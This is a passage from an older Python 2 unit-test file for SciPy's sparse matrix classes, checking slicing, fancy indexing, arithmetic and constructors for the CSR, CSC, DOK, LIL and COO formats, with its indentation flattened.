assert_array_equal(E[2, -2:], F[2, -2:].A)
# The following should raise exceptions:
caught = 0
try:
a = A[:,11]
except IndexError:
caught += 1
try:
a = A[6,3:7]
except IndexError:
caught += 1
assert_(caught == 2)
class _TestVertSlicing:
"""Tests vertical slicing (e.g. [:, 0]). Tests for individual sparse
matrix types that implement this should derive from this class.
"""
def test_get_vert_slice(self):
"""Test for new slice functionality (EJS)"""
B = asmatrix(arange(50.).reshape(5,10))
A = self.spmatrix(B)
assert_array_equal(B[2:5,0], A[2:5,0].todense())
assert_array_equal(B[:,1], A[:,1].todense())
C = matrix([[1, 2, 1], [4, 0, 6], [0, 0, 0], [0, 0, 1]])
D = self.spmatrix(C)
assert_array_equal(C[1:3, 1], D[1:3, 1].todense())
assert_array_equal(C[:, 2], D[:, 2].todense())
# Now test slicing when a column contains only zeros
E = matrix([[1, 0, 1], [4, 0, 0], [0, 0, 0], [0, 0, 1]])
F = self.spmatrix(E)
assert_array_equal(E[:, 1], F[:, 1].todense())
assert_array_equal(E[-2:, 2], F[-2:, 2].todense())
# The following should raise exceptions:
caught = 0
try:
a = A[:,11]
except IndexError:
caught += 1
try:
a = A[6,3:7]
except IndexError:
caught += 1
assert_(caught == 2)
class _TestBothSlicing:
"""Tests vertical and horizontal slicing (e.g. [:,0:2]). Tests for
individual sparse matrix types that implement this should derive from this
class.
"""
def test_get_slices(self):
B = asmatrix(arange(50.).reshape(5,10))
A = self.spmatrix(B)
assert_array_equal(A[2:5,0:3].todense(), B[2:5,0:3])
assert_array_equal(A[1:,:-1].todense(), B[1:,:-1])
assert_array_equal(A[:-1,1:].todense(), B[:-1,1:])
# Now test slicing when a column contains only zeros
E = matrix([[1, 0, 1], [4, 0, 0], [0, 0, 0], [0, 0, 1]])
F = self.spmatrix(E)
assert_array_equal(E[1:2, 1:2], F[1:2, 1:2].todense())
assert_array_equal(E[:, 1:], F[:, 1:].todense())
class _TestFancyIndexing:
"""Tests fancy indexing features. The tests for any matrix formats
that implement these features should derive from this class.
"""
def test_fancy_indexing_set(self):
n, m = (5, 10)
def _test_set(i, j, nitems):
A = self.spmatrix((n, m))
A[i, j] = 1
assert_almost_equal(A.sum(), nitems)
assert_almost_equal(A[i, j], 1)
# [i,j]
for i, j in [(2, 3), (-1, 8), (-1, -2), (array(-1), -2), (-1, array(-2)),
(array(-1), array(-2))]:
_test_set(i, j, 1)
# [i,1:2]
for i, j in [(2, slice(m)), (2, slice(5, -2)), (array(2), slice(5, -2))]:
_test_set(i, j, 3)
def test_fancy_indexing(self):
B = asmatrix(arange(50).reshape(5,10))
A = self.spmatrix( B )
# [i,j]
assert_equal(A[2,3], B[2,3])
assert_equal(A[-1,8], B[-1,8])
assert_equal(A[-1,-2],B[-1,-2])
assert_equal(A[array(-1),-2],B[-1,-2])
assert_equal(A[-1,array(-2)],B[-1,-2])
assert_equal(A[array(-1),array(-2)],B[-1,-2])
# [i,1:2]
assert_equal(A[2,:].todense(), B[2,:])
assert_equal(A[2,5:-2].todense(),B[2,5:-2])
assert_equal(A[array(2),5:-2].todense(),B[2,5:-2])
# [i,[1,2]]
assert_equal(A[3,[1,3]].todense(), B[3,[1,3]])
assert_equal(A[-1,[2,-5]].todense(),B[-1,[2,-5]])
assert_equal(A[array(-1),[2,-5]].todense(),B[-1,[2,-5]])
assert_equal(A[-1,array([2,-5])].todense(),B[-1,[2,-5]])
assert_equal(A[array(-1),array([2,-5])].todense(),B[-1,[2,-5]])
# [1:2,j]
assert_equal(A[:,2].todense(), B[:,2])
assert_equal(A[3:4,9].todense(), B[3:4,9])
assert_equal(A[1:4,-5].todense(),B[1:4,-5])
assert_equal(A[2:-1,3].todense(),B[2:-1,3])
assert_equal(A[2:-1,array(3)].todense(),B[2:-1,3])
# [1:2,1:2]
assert_equal(A[1:2,1:2].todense(),B[1:2,1:2])
assert_equal(A[4:,3:].todense(), B[4:,3:])
assert_equal(A[:4,:5].todense(), B[:4,:5])
assert_equal(A[2:-1,:5].todense(),B[2:-1,:5])
# [1:2,[1,2]]
assert_equal(A[:,[2,8,3,-1]].todense(),B[:,[2,8,3,-1]])
assert_equal(A[3:4,[9]].todense(), B[3:4,[9]])
assert_equal(A[1:4,[-1,-5]].todense(), B[1:4,[-1,-5]])
assert_equal(A[1:4,array([-1,-5])].todense(), B[1:4,[-1,-5]])
# [[1,2],j]
assert_equal(A[[1,3],3].todense(), B[[1,3],3])
assert_equal(A[[2,-5],-4].todense(), B[[2,-5],-4])
assert_equal(A[array([2,-5]),-4].todense(), B[[2,-5],-4])
assert_equal(A[[2,-5],array(-4)].todense(), B[[2,-5],-4])
assert_equal(A[array([2,-5]),array(-4)].todense(), B[[2,-5],-4])
# [[1,2],1:2]
assert_equal(A[[1,3],:].todense(), B[[1,3],:])
assert_equal(A[[2,-5],8:-1].todense(),B[[2,-5],8:-1])
assert_equal(A[array([2,-5]),8:-1].todense(),B[[2,-5],8:-1])
# [[1,2],[1,2]]
assert_equal(A[[1,3],[2,4]], B[[1,3],[2,4]])
assert_equal(A[[-1,-3],[2,-4]],B[[-1,-3],[2,-4]])
assert_equal(A[array([-1,-3]),[2,-4]],B[[-1,-3],[2,-4]])
assert_equal(A[[-1,-3],array([2,-4])],B[[-1,-3],[2,-4]])
assert_equal(A[array([-1,-3]),array([2,-4])],B[[-1,-3],[2,-4]])
# [[[1],[2]],[1,2]]
assert_equal(A[[[1],[3]],[2,4]].todense(), B[[[1],[3]],[2,4]])
assert_equal(A[[[-1],[-3],[-2]],[2,-4]].todense(),B[[[-1],[-3],[-2]],[2,-4]])
assert_equal(A[array([[-1],[-3],[-2]]),[2,-4]].todense(),B[[[-1],[-3],[-2]],[2,-4]])
assert_equal(A[[[-1],[-3],[-2]],array([2,-4])].todense(),B[[[-1],[-3],[-2]],[2,-4]])
assert_equal(A[array([[-1],[-3],[-2]]),array([2,-4])].todense(),B[[[-1],[-3],[-2]],[2,-4]])
# [i]
assert_equal(A[1,:].todense(), B[1,:])
assert_equal(A[-2,:].todense(),B[-2,:])
assert_equal(A[array(-2),:].todense(),B[-2,:])
# [1:2]
assert_equal(A[1:4].todense(), B[1:4])
assert_equal(A[1:-2].todense(),B[1:-2])
# [[1,2]]
assert_equal(A[[1,3]].todense(), B[[1,3]])
assert_equal(A[[-1,-3]].todense(),B[[-1,-3]])
assert_equal(A[array([-1,-3])].todense(),B[[-1,-3]])
# [[1,2],:][:,[1,2]]
assert_equal(A[[1,3],:][:,[2,4]].todense(), B[[1,3],:][:,[2,4]] )
assert_equal(A[[-1,-3],:][:,[2,-4]].todense(), B[[-1,-3],:][:,[2,-4]] )
assert_equal(A[array([-1,-3]),:][:,array([2,-4])].todense(), B[[-1,-3],:][:,[2,-4]] )
# [:,[1,2]][[1,2],:]
assert_equal(A[:,[1,3]][[2,4],:].todense(), B[:,[1,3]][[2,4],:] )
assert_equal(A[:,[-1,-3]][[2,-4],:].todense(), B[:,[-1,-3]][[2,-4],:] )
assert_equal(A[:,array([-1,-3])][array([2,-4]),:].todense(), B[:,[-1,-3]][[2,-4],:] )
# Check bug reported by Robert Cimrman:
# http://thread.gmane.org/gmane.comp.python.scientific.devel/7986
s = slice(int8(2),int8(4),None)
assert_equal(A[s,:].todense(), B[2:4,:])
assert_equal(A[:,s].todense(), B[:,2:4])
def test_fancy_indexing_randomized(self):
random.seed(0) # make runs repeatable
NUM_SAMPLES = 50
M = 6
N = 4
D = np.asmatrix(np.random.rand(M,N))
D = np.multiply(D, D > 0.5)
I = np.random.random_integers(-M + 1, M - 1, size=NUM_SAMPLES)
J = np.random.random_integers(-N + 1, N - 1, size=NUM_SAMPLES)
S = self.spmatrix(D)
assert_equal(S[I,J], D[I,J])
I_bad = I + M
J_bad = J - N
assert_raises(IndexError, S.__getitem__, (I_bad,J))
assert_raises(IndexError, S.__getitem__, (I,J_bad))
class _TestArithmetic:
"""
Test real/complex arithmetic
"""
def arith_init(self):
#these can be represented exactly in FP (so arithmetic should be exact)
self.A = matrix([[ -1.5, 6.5, 0, 2.25, 0, 0],
[ 3.125, -7.875, 0.625, 0, 0, 0],
[ 0, 0, -0.125, 1.0, 0, 0],
[ 0, 0, 8.375, 0, 0, 0]],'float64')
self.B = matrix([[ 0.375, 0, 0, 0, -5, 2.5],
[ 14.25, -3.75, 0, 0, -0.125, 0],
[ 0, 7.25, 0, 0, 0, 0],
[ 18.5, -0.0625, 0, 0, 0, 0]],'complex128')
self.B.imag = matrix([[ 1.25, 0, 0, 0, 6, -3.875],
[ 2.25, 4.125, 0, 0, 0, 2.75],
[ 0, 4.125, 0, 0, 0, 0],
[ -0.0625, 0, 0, 0, 0, 0]],'float64')
#fractions are all x/16ths
assert_array_equal((self.A*16).astype('int32'),16*self.A)
assert_array_equal((self.B.real*16).astype('int32'),16*self.B.real)
assert_array_equal((self.B.imag*16).astype('int32'),16*self.B.imag)
self.Asp = self.spmatrix(self.A)
self.Bsp = self.spmatrix(self.B)
def test_add_sub(self):
self.arith_init()
#basic tests
assert_array_equal((self.Asp+self.Bsp).todense(),self.A+self.B)
#check conversions
for x in supported_dtypes:
A = self.A.astype(x)
Asp = self.spmatrix(A)
for y in supported_dtypes:
B = self.B.astype(y)
Bsp = self.spmatrix(B)
#addition
D1 = A + B
S1 = Asp + Bsp
assert_equal(S1.dtype,D1.dtype)
assert_array_equal(S1.todense(),D1)
assert_array_equal(Asp + B,D1) #check sparse + dense
assert_array_equal(A + Bsp,D1) #check dense + sparse
#subtraction
D1 = A - B
S1 = Asp - Bsp
assert_equal(S1.dtype,D1.dtype)
assert_array_equal(S1.todense(),D1)
assert_array_equal(Asp - B,D1) #check sparse - dense
assert_array_equal(A - Bsp,D1) #check dense - sparse
def test_mu(self):
self.arith_init()
#basic tests
assert_array_equal((self.Asp*self.Bsp.T).todense(),self.A*self.B.T)
for x in supported_dtypes:
A = self.A.astype(x)
Asp = self.spmatrix(A)
for y in supported_dtypes:
B = self.B.astype(y)
Bsp = self.spmatrix(B)
D1 = A * B.T
S1 = Asp * Bsp.T
assert_array_equal(S1.todense(),D1)
assert_equal(S1.dtype,D1.dtype)
class _Test2DSlicingRegression:
def test_non_unit_stride_2d_indexing_raises_exception(self):
# Regression test -- used to silently ignore the stride.
try:
self.spmatrix((500, 500))[0:100:2, 0:100:2]
except ValueError:
return
assert_(False) # Should not happen.
class TestCSR(_TestCommon, _TestGetSet, _TestSolve,
_TestInplaceArithmetic, _TestArithmetic,
_TestHorizSlicing, _TestVertSlicing, _TestBothSlicing,
_TestFancyIndexing, _Test2DSlicingRegression, TestCase):
spmatrix = csr_matrix
@dec.knownfailureif(True, "Fancy indexing is known to be broken for CSR" \
" matrices")
def test_fancy_indexing_set(self):
_TestFancyIndexing.test_fancy_indexing_set(self)
def test_constructor1(self):
b = matrix([[0,4,0],
[3,0,0],
[0,2,0]],'d')
bsp = csr_matrix(b)
assert_array_almost_equal(bsp.data,[4,3,2])
assert_array_equal(bsp.indices,[1,0,1])
assert_array_equal(bsp.indptr,[0,1,2,3])
assert_equal(bsp.getnnz(),3)
assert_equal(bsp.getformat(),'csr')
assert_array_equal(bsp.todense(),b)
def test_constructor2(self):
b = zeros((6,6),'d')
b[3,4] = 5
bsp = csr_matrix(b)
assert_array_almost_equal(bsp.data,[5])
assert_array_equal(bsp.indices,[4])
assert_array_equal(bsp.indptr,[0,0,0,0,1,1,1])
assert_array_almost_equal(bsp.todense(),b)
def test_constructor3(self):
b = matrix([[1,0],
[0,2],
[3,0]],'d')
bsp = csr_matrix(b)
assert_array_almost_equal(bsp.data,[1,2,3])
assert_array_equal(bsp.indices,[0,1,0])
assert_array_equal(bsp.indptr,[0,1,2,3])
assert_array_almost_equal(bsp.todense(),b)
### currently disabled
## def test_constructor4(self):
## """try using int64 indices"""
## data = arange( 6 ) + 1
## col = array( [1, 2, 1, 0, 0, 2], dtype='int64' )
## ptr = array( [0, 2, 4, 6], dtype='int64' )
##
## a = csr_matrix( (data, col, ptr), shape = (3,3) )
##
## b = matrix([[0,1,2],
## [4,3,0],
## [5,0,6]],'d')
##
## assert_equal(a.indptr.dtype,numpy.dtype('int64'))
## assert_equal(a.indices.dtype,numpy.dtype('int64'))
## assert_array_equal(a.todense(),b)
def test_constructor4(self):
"""using (data, ij) format"""
row = array([2, 3, 1, 3, 0, 1, 3, 0, 2, 1, 2])
col = array([0, 1, 0, 0, 1, 1, 2, 2, 2, 2, 1])
data = array([ 6., 10., 3., 9., 1., 4.,
11., 2., 8., 5., 7.])
ij = vstack((row,col))
csr = csr_matrix((data,ij),(4,3))
assert_array_equal(arange(12).reshape(4,3),csr.todense())
def test_constructor5(self):
"""infer dimensions from arrays"""
indptr = array([0,1,3,3])
indices = array([0,5,1,2])
data = array([1,2,3,4])
csr = csr_matrix((data, indices, indptr))
assert_array_equal(csr.shape,(3,6))
def test_sort_indices(self):
data = arange( 5 )
indices = array( [7, 2, 1, 5, 4] )
indptr = array( [0, 3, 5] )
asp = csr_matrix( (data, indices, indptr), shape=(2,10) )
bsp = asp.copy()
asp.sort_indices( )
assert_array_equal(asp.indices,[1, 2, 7, 4, 5])
assert_array_equal(asp.todense(),bsp.todense())
def test_eliminate_zeros(self):
data = array( [1, 0, 0, 0, 2, 0, 3, 0] )
indices = array( [1, 2, 3, 4, 5, 6, 7, 8] )
indptr = array( [0, 3, 8] )
asp = csr_matrix( (data, indices, indptr), shape=(2,10) )
bsp = asp.copy()
asp.eliminate_zeros( )
assert_array_equal(asp.nnz, 3)
assert_array_equal(asp.data,[1, 2, 3])
assert_array_equal(asp.todense(),bsp.todense())
def test_ufuncs(self):
X = csr_matrix(np.arange(20).reshape(4, 5) / 20.)
for f in ["sin", "tan", "arcsin", "arctan", "sinh", "tanh",
"arcsinh", "arctanh", "rint", "sign", "expm1", "log1p",
"deg2rad", "rad2deg", "floor", "ceil", "trunc"]:
assert_equal(hasattr(csr_matrix, f), True)
X2 = getattr(X, f)()
assert_equal(X.shape, X2.shape)
assert_array_equal(X.indices, X2.indices)
assert_array_equal(X.indptr, X2.indptr)
assert_array_equal(X2.toarray(), getattr(np, f)(X.toarray()))
def test_unsorted_arithmetic(self):
data = arange( 5 )
indices = array( [7, 2, 1, 5, 4] )
indptr = array( [0, 3, 5] )
asp = csr_matrix( (data, indices, indptr), shape=(2,10) )
data = arange( 6 )
indices = array( [8, 1, 5, 7, 2, 4] )
indptr = array( [0, 2, 6] )
bsp = csr_matrix( (data, indices, indptr), shape=(2,10) )
assert_equal((asp + bsp).todense(), asp.todense() + bsp.todense())
class TestCSC(_TestCommon, _TestGetSet, _TestSolve,
_TestInplaceArithmetic, _TestArithmetic,
_TestHorizSlicing, _TestVertSlicing, _TestBothSlicing,
_TestFancyIndexing, _Test2DSlicingRegression, TestCase):
spmatrix = csc_matrix
@dec.knownfailureif(True, "Fancy indexing is known to be broken for CSC" \
" matrices")
def test_fancy_indexing_set(self):
_TestFancyIndexing.test_fancy_indexing_set(self)
def test_constructor1(self):
b = matrix([[1,0,0,0],[0,0,1,0],[0,2,0,3]],'d')
bsp = csc_matrix(b)
assert_array_almost_equal(bsp.data,[1,2,1,3])
assert_array_equal(bsp.indices,[0,2,1,2])
assert_array_equal(bsp.indptr,[0,1,2,3,4])
assert_equal(bsp.getnnz(),4)
assert_equal(bsp.shape,b.shape)
assert_equal(bsp.getformat(),'csc')
def test_constructor2(self):
b = zeros((6,6),'d')
b[2,4] = 5
bsp = csc_matrix(b)
assert_array_almost_equal(bsp.data,[5])
assert_array_equal(bsp.indices,[2])
assert_array_equal(bsp.indptr,[0,0,0,0,0,1,1])
def test_constructor3(self):
b = matrix([[1,0],[0,0],[0,2]],'d')
bsp = csc_matrix(b)
assert_array_almost_equal(bsp.data,[1,2])
assert_array_equal(bsp.indices,[0,2])
assert_array_equal(bsp.indptr,[0,1,2])
def test_constructor4(self):
"""using (data, ij) format"""
row = array([2, 3, 1, 3, 0, 1, 3, 0, 2, 1, 2])
col = array([0, 1, 0, 0, 1, 1, 2, 2, 2, 2, 1])
data = array([ 6., 10., 3., 9., 1., 4.,
11., 2., 8., 5., 7.])
ij = vstack((row,col))
csc = csc_matrix((data,ij),(4,3))
assert_array_equal(arange(12).reshape(4,3),csc.todense())
def test_constructor5(self):
"""infer dimensions from arrays"""
indptr = array([0,1,3,3])
indices = array([0,5,1,2])
data = array([1,2,3,4])
csc = csc_matrix((data, indices, indptr))
assert_array_equal(csc.shape,(6,3))
def test_eliminate_zeros(self):
data = array( [1, 0, 0, 0, 2, 0, 3, 0] )
indices = array( [1, 2, 3, 4, 5, 6, 7, 8] )
indptr = array( [0, 3, 8] )
asp = csc_matrix( (data, indices, indptr), shape=(10,2) )
bsp = asp.copy()
asp.eliminate_zeros( )
assert_array_equal(asp.nnz, 3)
assert_array_equal(asp.data,[1, 2, 3])
assert_array_equal(asp.todense(),bsp.todense())
def test_sort_indices(self):
data = arange( 5 )
row = array( [7, 2, 1, 5, 4] )
ptr = [0, 3, 5]
asp = csc_matrix( (data, row, ptr), shape=(10,2) )
bsp = asp.copy()
asp.sort_indices()
assert_array_equal(asp.indices,[1, 2, 7, 4, 5])
assert_array_equal(asp.todense(),bsp.todense())
def test_ufuncs(self):
X = csc_matrix(np.arange(21).reshape(7, 3) / 21.)
for f in ["sin", "tan", "arcsin", "arctan", "sinh", "tanh",
"arcsinh", "arctanh", "rint", "sign", "expm1", "log1p",
"deg2rad", "rad2deg", "floor", "ceil", "trunc"]:
assert_equal(hasattr(csr_matrix, f), True)
X2 = getattr(X, f)()
assert_equal(X.shape, X2.shape)
assert_array_equal(X.indices, X2.indices)
assert_array_equal(X.indptr, X2.indptr)
assert_array_equal(X2.toarray(), getattr(np, f)(X.toarray()))
def test_unsorted_arithmetic(self):
data = arange( 5 )
indices = array( [7, 2, 1, 5, 4] )
indptr = array( [0, 3, 5] )
asp = csc_matrix( (data, indices, indptr), shape=(10,2) )
data = arange( 6 )
indices = array( [8, 1, 5, 7, 2, 4] )
indptr = array( [0, 2, 6] )
bsp = csc_matrix( (data, indices, indptr), shape=(10,2) )
assert_equal((asp + bsp).todense(), asp.todense() + bsp.todense())
class TestDOK(_TestCommon, _TestGetSet, _TestSolve, TestCase):
spmatrix = dok_matrix
def test_mult(self):
A = dok_matrix((10,10))
A[0,3] = 10
A[5,6] = 20
D = A*A.T
E = A*A.H
assert_array_equal(D.A, E.A)
def test_add(self):
A = dok_matrix((3,2))
A[0,1] = -10
A[2,0] = 20
A = A + 10
B = matrix([[10, 0], [10, 10], [30, 10]])
assert_array_equal(A.todense(), B)
def test_convert(self):
"""Test provided by Andrew Straw. Fails in SciPy <= r1477.
"""
(m, n) = (6, 7)
a=dok_matrix((m, n))
# set a few elements, but none in the last column
a[2,1]=1
a[0,2]=2
a[3,1]=3
a[1,5]=4
a[4,3]=5
a[4,2]=6
# assert that the last column is all zeros
assert_array_equal( a.toarray()[:,n-1], zeros(m,) )
# make sure it still works for CSC format
csc=a.tocsc()
assert_array_equal( csc.toarray()[:,n-1], zeros(m,) )
# now test CSR
(m, n) = (n, m)
b = a.transpose()
assert_equal(b.shape, (m, n))
# assert that the last row is all zeros
assert_array_equal( b.toarray()[m-1,:], zeros(n,) )
# make sure it still works for CSR format
csr=b.tocsr()
assert_array_equal( csr.toarray()[m-1,:], zeros(n,))
def test_set_slice(self):
"""Test for slice functionality (EJS)"""
A = dok_matrix((5,10))
B = zeros((5,10), float)
A[:,0] = 1
B[:,0] = 1
assert_array_equal(A.todense(), B)
A[1,:] = 2
B[1,:] = 2
assert_array_equal(A.todense(), B)
A[:,:] = 3
B[:,:] = 3
assert_array_equal(A.todense(), B)
A[1:5, 3] = 4
B[1:5, 3] = 4
assert_array_equal(A.todense(), B)
A[1, 3:6] = 5
B[1, 3:6] = 5
assert_array_equal(A.todense(), B)
A[1:4, 3:6] = 6
B[1:4, 3:6] = 6
assert_array_equal(A.todense(), B)
A[1, 3:10:3] = 7
B[1, 3:10:3] = 7
assert_array_equal(A.todense(), B)
A[1:5, 0] = range(1,5)
B[1:5, 0] = range(1,5)
assert_array_equal(A.todense(), B)
A[0, 1:10:2] = xrange(1,10,2)
B[0, 1:10:2] = xrange(1,10,2)
assert_array_equal(A.todense(), B)
caught = 0
# The next 6 commands should raise exceptions
try:
A[0,0] = range(100)
except ValueError:
caught += 1
try:
A[0,0] = arange(100)
except ValueError:
caught += 1
try:
A[0,:] = range(100)
except ValueError:
caught += 1
try:
A[:,1] = range(100)
except ValueError:
caught += 1
try:
A[:,1] = A.copy()
except:
caught += 1
assert_equal(caught,5)
def test_ctor(self):
caught = 0
# Empty ctor
try:
A = dok_matrix()
except TypeError, e:
caught+=1
assert_equal(caught, 1)
# Dense ctor
b = matrix([[1,0,0,0],[0,0,1,0],[0,2,0,3]],'d')
A = dok_matrix(b)
assert_equal(A.todense(), b)
# Sparse ctor
c = csr_matrix(b)
assert_equal(A.todense(), c.todense())
def test_resize(self):
"""A couple basic tests of the resize() method.
resize(shape) resizes the array in-place.
"""
a = dok_matrix((5,5))
a[:,0] = 1
a.resize((2,2))
expected1 = array([[1,0],[1,0]])
assert_array_equal(a.todense(), expected1)
a.resize((3,2))
expected2 = array([[1,0],[1,0],[0,0]])
assert_array_equal(a.todense(), expected2)
def test_ticket1160(self):
"""Regression test for ticket #1160."""
a = dok_matrix((3,3))
a[0,0] = 0
# This assert would fail, because the above assignment would
# incorrectly call __set_item__ even though the value was 0.
assert_((0,0) not in a.keys(), "Unexpected entry (0,0) in keys")
# Slice assignments were also affected.
b = dok_matrix((3,3))
b[:,0] = 0
assert_(len(b.keys())==0, "Unexpected entries in keys")
# The following five tests are duplicates from _TestCommon, so they can be
# marked as knownfail for Python 2.4. Once 2.4 is no longer supported,
# these duplicates can be removed again.
@dec.knownfailureif(sys.version[:3] == '2.4', "See ticket 1559")
def test_add_dense(self):
""" adding a dense matrix to a sparse matrix
"""
sum1 = self.dat + self.datsp
assert_array_equal(sum1, 2*self.dat)
sum2 = self.datsp + self.dat
assert_array_equal(sum2, 2*self.dat)
@dec.knownfailureif(sys.version[:3] == '2.4', "See ticket 1559")
def test_radd(self):
a = self.dat.copy()
a[0,2] = 2.0
b = self.datsp
c = a + b
assert_array_equal(c,[[2,0,2,4],[6,0,2,0],[0,4,0,0]])
@dec.knownfailureif(sys.version[:3] == '2.4', "See ticket 1559")
def test_rsub(self):
assert_array_equal((self.dat - self.datsp),[[0,0,0,0],[0,0,0,0],[0,0,0,0]])
assert_array_equal((self.datsp - self.dat),[[0,0,0,0],[0,0,0,0],[0,0,0,0]])
A = self.spmatrix(matrix([[1,0,0,4],[-1,0,0,0],[0,8,0,-5]],'d'))
assert_array_equal((self.dat - A),self.dat - A.todense())
assert_array_equal((A - self.dat),A.todense() - self.dat)
assert_array_equal(A.todense() - self.datsp,A.todense() - self.dat)
assert_array_equal(self.datsp - A.todense(),self.dat - A.todense())
@dec.knownfailureif(sys.version[:3] == '2.4', "See ticket 1559")
def test_matmat_sparse(self):
a = matrix([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]])
a2 = array([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]])
b = matrix([[0,1],[1,0],[0,2]],'d')
asp = self.spmatrix(a)
bsp = self.spmatrix(b)
assert_array_almost_equal((asp*bsp).todense(), a*b)
assert_array_almost_equal( asp*b, a*b)
assert_array_almost_equal( a*bsp, a*b)
assert_array_almost_equal( a2*bsp, a*b)
# Now try performing cross-type multplication:
csp = bsp.tocsc()
c = b
assert_array_almost_equal((asp*csp).todense(), a*c)
assert_array_almost_equal( asp*c, a*c)
assert_array_almost_equal( a*csp, a*c)
assert_array_almost_equal( a2*csp, a*c)
csp = bsp.tocsr()
assert_array_almost_equal((asp*csp).todense(), a*c)
assert_array_almost_equal( asp*c, a*c)
assert_array_almost_equal( a*csp, a*c)
assert_array_almost_equal( a2*csp, a*c)
csp = bsp.tocoo()
assert_array_almost_equal((asp*csp).todense(), a*c)
assert_array_almost_equal( asp*c, a*c)
assert_array_almost_equal( a*csp, a*c)
assert_array_almost_equal( a2*csp, a*c)
# Test provided by Andy Fraser, 2006-03-26
L = 30
frac = .3
random.seed(0) # make runs repeatable
A = zeros((L,2))
for i in xrange(L):
for j in xrange(2):
r = random.random()
if r < frac:
A[i,j] = r/frac
A = self.spmatrix(A)
B = A*A.T
assert_array_almost_equal(B.todense(), A.todense() * A.T.todense())
assert_array_almost_equal(B.todense(), A.todense() * A.todense().T)
# check dimension mismatch 2x2 times 3x2
A = self.spmatrix( [[1,2],[3,4]] )
B = self.spmatrix( [[1,2],[3,4],[5,6]] )
assert_raises(ValueError, A.__mul__, B)
@dec.knownfailureif(sys.version[:3] == '2.4', "See ticket 1559")
def test_sub_dense(self):
""" subtracting a dense matrix to/from a sparse matrix
"""
sum1 = 3*self.dat - self.datsp
assert_array_equal(sum1, 2*self.dat)
sum2 = 3*self.datsp - self.dat
assert_array_equal(sum2, 2*self.dat)
class TestLIL( _TestCommon, _TestHorizSlicing, _TestVertSlicing,
_TestBothSlicing, _TestGetSet, _TestSolve,
_TestArithmetic, _TestInplaceArithmetic, _TestFancyIndexing,
TestCase):
spmatrix = lil_matrix
B = lil_matrix((4,3))
B[0,0] = 2
B[1,2] = 7
B[2,1] = 3
B[3,0] = 10
@dec.knownfailureif(True, "Fancy indexing is known to be broken for LIL" \
" matrices")
def test_fancy_indexing_set(self):
_TestFancyIndexing.test_fancy_indexing_set(self)
@dec.knownfailureif(True, "Fancy indexing is known to be broken for LIL" \
" matrices")
def test_fancy_indexing_randomized(self):
_TestFancyIndexing.test_fancy_indexing_randomized(self)
def test_dot(self):
A = matrix(zeros((10,10)))
A[0,3] = 10
A[5,6] = 20
B = lil_matrix((10,10))
B[0,3] = 10
B[5,6] = 20
assert_array_equal(A * A.T, (B * B.T).todense())
assert_array_equal(A * A.H, (B * B.H).todense())
def test_scalar_mul(self):
x = lil_matrix((3,3))
x[0,0] = 2
x = x*2
assert_equal(x[0,0],4)
x = x*0
assert_equal(x[0,0],0)
def test_reshape(self):
x = lil_matrix((4,3))
x[0,0] = 1
x[2,1] = 3
x[3,2] = 5
x[0,2] = 7
for s in [(12,1),(1,12)]:
assert_array_equal(x.reshape(s).todense(),
x.todense().reshape(s))
def test_lil_lil_assignment(self):
""" Tests whether a row of one lil_matrix can be assigned to
another.
"""
B = self.B.copy()
A = B / 10
B[0,:] = A[0,:]
assert_array_equal(A[0,:].A, B[0,:].A)
def test_inplace_ops(self):
A = lil_matrix([[0,2,3],[4,0,6]])
B = lil_matrix([[0,1,0],[0,2,3]])
data = {'add': (B,A + B),
'sub': (B,A - B),
'mul': (3,A * 3)}
for op,(other,expected) in data.iteritems():
result = A.copy()
getattr(result, '__i%s__' % op)(other)
assert_array_equal(result.todense(), expected.todense())
def test_lil_slice_assignment(self):
B = lil_matrix((4,3))
B[0,0] = 5
B[1,2] = 3
B[2,1] = 7
expected = array([[10,0,0],
[0,0,6],
[0,14,0],
[0,0,0]])
B[:,:] = B+B
assert_array_equal(B.todense(),expected)
block = [[1,0],[0,4]]
B[:2,:2] = csc_matrix(array(block))
assert_array_equal(B.todense()[:2,:2],block)
def test_lil_sequence_assignment(self):
A = lil_matrix((4,3))
B = eye(3,4,format='lil')
i0 = [0,1,2]
i1 = (0,1,2)
i2 = array( i0 )
A[0,i0] = B[i0,0]
A[1,i1] = B[i1,1]
A[2,i2] = B[i2,2]
assert_array_equal(A.todense(),B.T.todense())
# column slice
A = lil_matrix((2,3))
A[1,1:3] = [10,20]
assert_array_equal(A.todense(), [[0,0,0],[0,10,20]])
# column slice
A = lil_matrix((3,2))
A[1:3,1] = [[10],[20]]
assert_array_equal(A.todense(), [[0,0],[0,10],[0,20]])
def test_lil_iteration(self):
row_data = [[1,2,3],[4,5,6]]
B = lil_matrix(array(row_data))
for r,row in enumerate(B):
assert_array_equal(row.todense(),array(row_data[r],ndmin=2))
def test_lil_from_csr(self):
""" Tests whether a lil_matrix can be constructed from a
csr_matrix.
"""
B = lil_matrix((10,10))
B[0,3] = 10
B[5,6] = 20
B[8,3] = 30
B[3,8] = 40
B[8,9] = 50
C = B.tocsr()
D = lil_matrix(C)
assert_array_equal(C.A, D.A)
def test_fancy_indexing(self):
M = arange(25).reshape(5,5)
A = lil_matrix( M )
assert_equal(A[array([1,2,3]),2:3].todense(), M[array([1,2,3]),2:3])
def test_point_wise_multiply(self):
l = lil_matrix((4,3))
l[0,0] = 1
l[1,1] = 2
l[2,2] = 3
l[3,1] = 4
m = lil_matrix((4,3))
m[0,0] = 1
m[0,1] = 2
m[2,2] = 3
m[3,1] = 4
m[3,2] = 4
assert_array_equal(l.multiply(m).todense(),
m.multiply(l).todense())
assert_array_equal(l.multiply(m).todense(),
[[1,0,0],
[0,0,0],
[0,0,9],
[0,16,0]])
def test_lil_multiply_removal(self):
"""Ticket #1427."""
a = lil_matrix(np.ones((3,3)))
a *= 2.
a[0, :] = 0
class TestCOO(_TestCommon, TestCase):
spmatrix = coo_matrix
def test_constructor1(self):
"""unsorted triplet format"""
row = array([2, 3, 1, 3, 0, 1, 3, 0, 2, 1, 2])
col = array([0, 1, 0, 0, 1, 1, 2, 2, 2, 2, 1])
data = array([ 6., 10., 3., 9., 1., 4.,
11., 2., 8., 5., 7.])
coo = coo_matrix((data,(row,col)),(4,3))
assert_array_equal(arange(12).reshape(4,3),coo.todense())
def test_constructor2(self):
"""unsorted triplet format with duplicates (which are summed)"""
row = array([0,1,2,2,2,2,0,0,2,2])
col = array([0,2,0,2,1,1,1,0,0,2])
data = array([2,9,-4,5,7,0,-1,2,1,-5])
coo = coo_matrix((data,(row,col)),(3,3))
mat = matrix([[4,-1,0],[0,0,9],[-3,7,0]])
